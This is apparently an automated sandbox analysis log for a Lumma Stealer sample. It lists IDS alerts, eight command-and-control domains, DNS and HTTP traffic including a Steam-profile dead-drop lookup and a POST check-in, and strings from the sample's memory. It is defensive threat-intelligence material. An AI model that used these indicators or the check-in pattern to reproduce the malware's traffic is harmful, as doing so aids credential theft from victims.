      Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:62727 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.5:55784 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
      Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https:0M equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=355ae53a3900853509b7ceaa; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Conte equals www.youtube.com (Youtube)
      Source: HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=355ae53a3900853509b7ceaa; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 07:38:20 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
      Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
      Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
      Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
      Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
      Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
      Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
      Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
